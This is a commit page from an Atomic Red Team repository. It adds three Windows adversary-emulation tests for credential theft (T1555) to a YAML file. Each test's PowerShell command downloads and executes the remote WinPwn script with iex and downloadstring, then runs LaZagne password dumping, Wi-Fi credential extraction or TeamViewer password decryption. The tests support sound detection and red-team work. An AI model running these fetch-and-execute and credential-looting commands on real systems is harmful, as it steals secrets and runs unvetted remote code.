security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update T1555.yaml (#1948)

Browse Source 
* Update T1555.yaml

Loot local Credentials - Invoke-WCMDump technique via function of WinPwn
Loot local Credentials - Wifi Credentials technique via function of WinPwn
Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn

* Update T1555.yaml

added name: powershell

* Update T1555.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
tlor89
2022-05-12 20:20:49 -05:00
committed by GitHub
parent 15fd6519a6
commit b384c8b7ab
1 changed files with 33 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1555/T1555.yaml
+33
View File
@@ -69,3 +69,36 @@ atomic_tests:
elevation_required: false
command: |
vaultcmd /listcreds:"Web Credentials" /all
- name: WinPwn - Loot local Credentials - lazagne
description: |-
The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer.
Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.).
This tool has been developed for the purpose of finding these passwords for the most commonly-used software
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
lazagnemodule -consoleoutput -noninteractive
name: powershell
- name: WinPwn - Loot local Credentials - Wifi Credentials
description: Loot local Credentials - Wifi Credentials technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
wificreds -consoleoutput -noninteractive
name: powershell
- name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
description: Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
decryptteamviewer -consoleoutput -noninteractive
name: powershell